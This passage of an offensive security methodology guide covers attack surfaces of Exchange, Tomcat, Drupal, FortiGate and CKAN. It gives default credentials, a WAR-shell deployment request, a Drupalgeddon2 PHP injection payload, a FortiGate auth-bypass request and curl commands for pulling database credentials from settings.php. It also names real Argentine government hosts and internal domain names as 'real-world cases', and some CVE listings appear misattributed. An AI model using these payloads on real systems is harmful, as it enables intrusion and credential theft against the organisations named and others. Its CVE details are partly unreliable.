style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="exchange-cves-by-version" &gt;
&lt;div&gt;
&lt;a href="#exchange-cves-by-version"&gt;
###
&lt;/a&gt;
Exchange CVEs by Version
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Build&lt;/th&gt;
&lt;th&gt;Critical CVEs&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange 2016 CU23&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15.1.2507.x&lt;/td&gt;
&lt;td&gt;CVE-2024-21410 (NTLM relay), CVE-2023-32031 (RCE), CVE-2022-41040/41082 (ProxyNotShell)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange 2019 CU14&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15.2.1258.x&lt;/td&gt;
&lt;td&gt;CVE-2024-26198, CVE-2023-21529 (RCE), CVE-2023-21763 (auth bypass)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange 2013&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15.0.x&lt;/td&gt;
&lt;td&gt;ProxyLogon (CVE-2021-26855+) — pre-auth RCE&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;mail.enacom.gob.ar&lt;/code&gt; — Exchange 2016 (15.1.2507.61) with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NTLM Negotiate active on EWS, OAB, API&lt;/li&gt;
&lt;li&gt;Basic realm exposed (&amp;ldquo;mail.enacom.gob.ar&amp;rdquo;)&lt;/li&gt;
&lt;li&gt;Healthcheck revealed internal hostname: &lt;code&gt;ECBUE361.CNC.INTER&lt;/code&gt; (AD domain: &lt;code&gt;CNC.INTER&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;OAuth and WS-Security enabled (headers: &lt;code&gt;X-OAuth-Enabled: True&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="85-tomcat" &gt;
&lt;div&gt;
&lt;a href="#85-tomcat"&gt;
##
&lt;/a&gt;
8.5 Tomcat
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Manager apps (deploy WAR = RCE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/manager/html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/host-manager/html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Default credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# admin:admin, tomcat:tomcat, admin:password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# both:both, manager:manager, role1:role1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If PUT deploy is enabled:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PUT /manager/text/deploy?path&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;/shell HTTP/1.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content-Type: application/octet-stream
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;WAR file bytes&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="86-other-frameworks-and-their-indicators" &gt;
&lt;div&gt;
&lt;a href="#86-other-frameworks-and-their-indicators"&gt;
##
&lt;/a&gt;
8.6 Other Frameworks and Their Indicators
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Framework&lt;/th&gt;
&lt;th&gt;Headers/Indicators&lt;/th&gt;
&lt;th&gt;Sensitive Surface&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rails&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Server: WEBrick&lt;/code&gt;, &lt;code&gt;X-Runtime&lt;/code&gt;, &lt;code&gt;X-Request-Id&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/sidekiq&lt;/code&gt;, &lt;code&gt;/rails/mailers&lt;/code&gt;, &lt;code&gt;/rails/info&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;X-OWA-Version&lt;/code&gt;, &lt;code&gt;X-FEServer&lt;/code&gt;, &lt;code&gt;X-AspNet-Version&lt;/code&gt;, &lt;code&gt;WWW-Authenticate: NTLM&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/owa/&lt;/code&gt;, &lt;code&gt;/ecp/&lt;/code&gt;, &lt;code&gt;/ews/Exchange.asmx&lt;/code&gt;, &lt;code&gt;/autodiscover/&lt;/code&gt;, &lt;code&gt;/powershell/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Django&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;X-Frame-Options: DENY&lt;/code&gt;, CSRF token &lt;code&gt;csrftoken&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/admin&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/graphql/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Express/Node&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;X-Powered-By: Express&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/graphql&lt;/code&gt;, &lt;code&gt;/health&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AdonisJS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Error &lt;code&gt;@adonisjs/http-server&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/health&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Flask&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Server: Werkzeug/...&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/console&lt;/code&gt; (debug), &lt;code&gt;/api/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Nuxt.js&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;__nuxt&lt;/code&gt;, &lt;code&gt;__NUXT__&lt;/code&gt; in HTML&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.output/&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/_nuxt/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Next.js&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;__NEXT_DATA__&lt;/code&gt; in HTML&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/_next/&lt;/code&gt;, &lt;code&gt;/api/&lt;/code&gt;, &lt;code&gt;/_next/data/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Drupal&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Drupal&lt;/code&gt; in HTML, &lt;code&gt;/sites/default/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/user/login&lt;/code&gt;, &lt;code&gt;/node/&lt;/code&gt;, &lt;code&gt;/rest/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Joomla&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Joomla!&lt;/code&gt; in generator&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/administrator/&lt;/code&gt;, &lt;code&gt;/components/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CodeIgniter&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ci_session&lt;/code&gt; cookie&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/index.php/&lt;/code&gt;, &lt;code&gt;?ci_profiler=1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Drupal 6/7&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Drupal.settings&lt;/code&gt; in JS, &lt;code&gt;/misc/&lt;/code&gt;, &lt;code&gt;/modules/&lt;/code&gt;, &lt;code&gt;/themes/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/update.php&lt;/code&gt;, &lt;code&gt;/install.php&lt;/code&gt;, &lt;code&gt;/xmlrpc.php&lt;/code&gt;, &lt;code&gt;/cron.php&lt;/code&gt;, &lt;code&gt;/user/login&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CKAN&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/api/3/action/package_list&lt;/code&gt;, &lt;code&gt;/dataset/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/api/3/action/organization_list&lt;/code&gt; (open data)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OpenCms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;JSESSIONID&lt;/code&gt;, &lt;code&gt;OpenCms/version&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/handle404&lt;/code&gt;, &lt;code&gt;/opencms/opencms/secadmin/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="87-drupal--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#87-drupal--attack-surface"&gt;
##
&lt;/a&gt;
8.7 Drupal — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Drupal 6 and 7 (EOL) are common in government and universities. Massive vulnerabilities:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;Drupal\.settings|drupal\.org&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/CHANGELOG.txt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# robots.txt confirms Drupal: /misc/, /modules/, /profiles/, /themes/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Critical Drupal endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# update.php (DB update — access may allow SQL!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/update.php&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/update.php?op=info&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# install.php (if present = risk!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/install.php?profile=default&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# xmlrpc.php (active XML-RPC = same risk as WordPress)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;system.listMethods&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# cron.php (executes scheduled tasks)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/cron.php&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Main CVEs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2018-7600 (Drupalgeddon 2) — RCE via render arrays (Drupal 6/7/8)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Payload: POST /user/register?element_parents=account/mail/%23value&amp;amp;ajax_form=1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# + form_id=user_register_form&amp;amp;mail[#type]=markup&amp;amp;mail[#markup]=&amp;lt;?php system(&amp;#39;id&amp;#39;);?&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2019-6340 — RCE via RESTful Web Services (Drupal 8)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2014-3704 (Drupalgeddon 1) — SQLi (Drupal 7)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Sensitive files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/sites/default/files/.htaccess&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/sites/default/settings.php&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# DB credentials!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/sites/all/libraries/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government geographic agency — Drupal 6 + PHP 5.5.9 + Ubuntu 14.04:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;update.php&lt;/code&gt; accessible with update instructions exposed&lt;/li&gt;
&lt;li&gt;&lt;code&gt;install.php&lt;/code&gt; present (500, but exists)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;xmlrpc.php&lt;/code&gt; active (200)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cron.php&lt;/code&gt; accessible&lt;/li&gt;
&lt;li&gt;Drupalgeddon2 applicable → potential RCE&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="88-fortinet-fortigate-ssl-vpn--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#88-fortinet-fortigate-ssl-vpn--attack-surface"&gt;
##
&lt;/a&gt;
8.8 Fortinet FortiGate SSL VPN — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;VPN appliances are the most common entry point in 2024-2026. FortiGate is widely used in government.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify FortiGate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;forti&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/info&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# XML with config: salt, encmethod&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/login&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Login page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/fgt_lang?lang=en&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# 641KB language file → version!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. CVEs by impact order&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2022-40684 — Auth bypass (CVSS 9.8)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# curl -k -H &amp;#34;User-Agent: Node.js/12.0.0&amp;#34; \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# -H &amp;#34;X-Forwarded-For: 127.0.0.1&amp;#34; \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;https://TARGET/api/v2/cmdb/system/admin&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Returns admin users WITHOUT authentication!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2023-27997 — Heap overflow SSL-VPN (pre-auth RCE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2024-21887 — Command injection SSL-VPN (pre-auth RCE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CVE-2024-22024 — XXE → file read&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Fingerprinting via headers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/remote/login&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(server|set-cookie|www-authenticate)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;vpn.orgao.gov.ar&lt;/code&gt; — FortiGate SSL VPN exposed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/remote/info&lt;/code&gt; accessible exposing salt and &lt;code&gt;encmethod='0'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/remote/fgt_lang&lt;/code&gt; → 641KB of strings for fingerprinting&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/remote/logincheck&lt;/code&gt; — authentication endpoint&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/remote/portal&lt;/code&gt; — SSL VPN Web Portal&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="89-ckan-open-data--100-open-api" &gt;
&lt;div&gt;
&lt;a href="#89-ckan-open-data--100-open-api"&gt;
##
&lt;/a&gt;
8.9 CKAN Open Data — 100% Open API
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;CKAN is an open data platform common in governments. The API is public by design and exposes metadata from thousands of datasets:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify CKAN&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;ckan\|dataset&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/package_list&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Lists all datasets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Enumerate organizations (who publishes data)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/organization_list?all_fields=true&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;.result[] | {name, package_count: .package_count}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. List datasets from an organization&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/package_search?q=organization:org-name&amp;amp;rows=1000&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;.result.results[] | {name, title, resources: [.resources[].url]}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Search for specific datasets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/package_search?q=password&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.result.count&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Tags, groups, licenses&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/tag_list&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/api/3/action/group_list&amp;#34;&lt;/span&gt;
